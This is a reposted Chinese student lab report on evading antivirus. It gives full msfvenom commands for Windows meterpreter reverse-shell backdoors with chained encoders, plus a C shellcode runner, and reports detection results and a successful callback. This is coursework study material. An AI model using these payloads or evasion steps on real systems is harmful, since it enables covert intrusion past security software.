Exp3:MAL_免杀原理与实践

最新推荐文章于 2024-07-15 15:17:48 发布
最新推荐文章于 2024-07-15 15:17:48 发布
阅读量114 收藏
点赞数
文章标签: c/c++ 操作系统
原文链接:http://www.cnblogs.com/ikari/p/8747038.html
版权

目录

1.实验环境

病毒扫描引擎:virustotal.
靶机:windows8.1+windows defender

2.实践内容

2.1 msfvenom

2.1.1 msfvenom直接生成

利用msfvenom直接生成一个后门,上传到virustotal.扫描。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.243 LPORT=443 -f exe > backdoor.31.243.exe

1050108-20180408205409473-1859692538.png

放入主机立刻被windows defender检测隔离。

2.1.2 msfvenom 编码一次

  • 使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.31.243 LPORT=443 -f exe > encoded_1.exe

1050108-20180408205515702-56936105.png

实验结果

2.1.3 msfvenom 编码多次

  • 使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.31.243 LPORT=443 -f exe > encoded_10.exe

1050108-20180408205620230-1293784674.png

2.2 Veil_evasion免杀实践

2.3 C语言调用Shellcode

2.3.1Linux平台交叉编译Windows应用

利用指令会生成一个c语言格式的Shellcode数组。

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=443 -f c

编译调用shellcode。

int main()
{
    int(*func)() = (int(*)())buf;
    func();

}

实验结果

2.3.2VisualStudio

  • 实验原理:利用指令会生成一个c语言格式的Shellcode数组。之后利用C语言编程调用shellcode数组,在windows平台生成.exe, 在靶机上运行。
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=443 -f c

1050108-20180409212014140-1314832594.png

与上一个程序用相同的shellcode,将生成的C语言shellcode数组写成win32程序。不同的是此时用到了call函数。
1050108-20180409212039970-1258849703.png

  • 实验结果
    这次结果比上面好,现在尝试能否使用后门回连。
    1050108-20180409212124316-1528108651.png
    报错,需要安装vcredist 2013 x86
    1050108-20180409212138007-848435683.png
    1050108-20180409212144601-999491314.png
    回连成功,后门可以使用。

    2.3.3动态加密shellcode

    对比前两次结果,同一个shellcode被查杀的结果存在差异,很难判断call是否被杀毒软件定义为一个危险行为,下面将同一个shellcode动态加密一下,看看能不能对特征码有没有影响。
    1050108-20180409225555931-1613161114.png

  • 实验结果
    shellcode使用了下面的命令
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.31.243 LPORT=443 R |msfvenom -e x86/shikata_ga_nai -c 4 -t  raw|msfvenom -e x86/call4_dword_xor -c 3 -t  raw|msfvenom -e x86/context_time -c 3 -t  raw|msfvenom -e x86/jmp_call_additive -c 4 -t   raw|msfvenom -e x86/shikata_ga_nai -c 4 -t exe >  encode_31.243.exe

使用的编码次数太多,虽然达到了免杀效果,但是影响了使用,回连失败。

转载于:https://www.cnblogs.com/ikari/p/8747038.html

weixin_30809173
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手臂服务器::page_with_curl:在AniList,AniDB,MAL和Kitsu之间映射动漫ID的服务
02-05
手臂服务器 此应用使用 -每24小时获取并更新一次。条目缺失或重复由于命名不一致,数据库中的某些条目未正确映射anime-offline-database的所有者由于复杂性无法修复它们。 因此,此服务具有结合已知故障的手动规则。...
popura:[MAL API断开:winking_face:] MyAnimeList API的NodeJS包装器
05-16
MAL API的有前途的包装器。 警告 。 在解决内部问题之前,Popura不会工作。 目录 漫画模型 动漫列表项目模型 漫画清单项目模型 Myinfo模型 发展 执照 安装 $ npm install --save popura 用法 import popura ...
Exp3 免杀原理实践
04-07 120
一、问题回答 1. 杀软是如何检测出恶意代码的? [x] 基于特征码的检测 [x] 基于行为的恶意软件检测 2. 免杀是做什么? 就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面。 3. 免杀的基本方法有哪些? 加花指令:就是加入一些花里胡哨的指令来迷惑杀软,让杀软检测不到特征码,比如+1,-1,*1,/1什么的,但是一些厉害的杀软还可以看破这些。 加壳:...
20155339 Exp3 免杀原理实践
weixin_30672295的博客
04-08 119
20155339 Exp3 免杀原理实践 基础问题 (1)杀软是如何检测出恶意代码的? 基于特征码的检测(杀软的特征库中包含了一些数据或者数据段,杀软会尽可能的更新这个特征库,以包括尽可能多的恶意代码,当一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码)。 启发式恶意软件检测(很简单,就是根据些片面特征去推断,也就是进行检测,当某个软件或者程序想干一些看起来...
Exp3 免杀原理实践 20164320 王浩
weixin_34409741的博客
03-31 133
一、实验内容 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 1.3 用另一电脑实测,在杀软开启的情况下,可...
2017-2018 Exp3 MAL_免杀原理实践 20155214
NavyJhon2015的博客
04-05 177
目录 Exp3 MAL_免杀原理实践 实验内容 对msf生成后门程序的检测 Veil-Evasion应用 Visual Studio2017 + shellcode生成后门 主要思路 知识点 最后的进...
20155236范晨歌_EXP3免杀原理实践
djt1999的博客
04-11 195
20155236范晨歌_免杀原理实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 被谁杀?当然是被杀毒软件(引擎)杀。所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的。 恶意代码检测方...
Exp2 MAL_后门原理实践 20155214
NavyJhon2015的博客
03-30 206
目录 Exp2 MAL_后门原理实践 实验内容 通过nc反向连接创建后门 meterpreter应用 主要思路 知识点 启发 Exp2 MAL_后门原理实践 本次实验操使...
20155325 Exp3 免杀原理实践
azxkjsh204704390的博客
04-10 189
基础问题回答 杀软是如何检测出恶意代码的? 1.1 基于特征码的检测 1.1.1 特征库举例-Snort 1.2 启发式恶意软件检测 1.3 基于行为的恶意软件检测 免杀是做什么? 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 免杀的基本方法有哪些? 手工修改; 非源码 数据 如果特征码定位到数据(通过IDA/OD等确认),其实不好修改,稍微不慎就...
O3:MAL富氧O3
03-16
3. **可视化**:使用Matplotlib或Seaborn库创建图表,展示臭氧浓度随时间变化、与其他因素的关系等,帮助理解模式和趋势。 4. **模型构建**:可能涉及到建立化学动力学模型,预测在不同富氧条件下的臭氧生成和衰减,...
scrobbly::right_arrow_curving_left_selector:将动漫复制到Anistist,Kitsu!
01-31
更新您的动漫列表同时,仅通过在您喜欢的VoD网站上观看,此WebExtension(基于Firefox和Chromium)就可以更新您的Kitsu,AniList和MAL列表(目前,它仅支持Kitsu和AniList,但计划在下一版本中使用MAL) )。...
Mal_backend:恶意软件分析平台后端
04-17
![toc] Deps 二进制: apt install nasm 关于数据库: mongo://localhost:9999 neo4j://localhost:7474 关于沙箱: cuckoo://xxx:8090 ...execute .before.sh to start database flask run -h 0.0.0.0
c++ primer plus 第16章string 类和标准模板库,string 类输入
zhyjhacker的博客
07-14 1072
c++ primer plus 第16章string 类和标准模板库,string 类输入。
算法刷题笔记 KMP字符串(C++实现,并给出了求next数组的独家简单理解方式)
hanmo22357的博客
07-12 841
一道经典且较难的算法题,给出了C++代码实现,以及自己对next数组求解的独家简单的理解方式。
JNI: 在Kotlin和C++之间通过JNI进行接口传递,两边参数定义映射
最新发布
tyfwin的博客
07-15 992
在Kotlin和C++之间通过JNI进行接口传递时,需要注意两边参数定义的映射关系。JNI(Java Native Interface)为Java(Kotlin也适用)与本地语言(如C/C++)之间的交互提供了桥梁。在Kotlin中定义的外部函数和C++中的实现需要通过JNI签名相互对应。
c语言位操作符相关题目之交换两个数的值
something for nothing的博客
07-12 768
c语言题目之交换两个数的值
mal_train_X=X_train[y_train==0]和mal_train_X=X_train[y_train==1]的区别
06-01
第一个语句 mal_train_X=X_train[y_train==0] 表示将 X_train 中对应 y_train 等于 0 的元素赋值给 mal_train_X;而第二个语句 mal_train_X=X_train[y_train==1] 表示将 X_train 中对应 y_train 等于 1 的元素赋值给...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值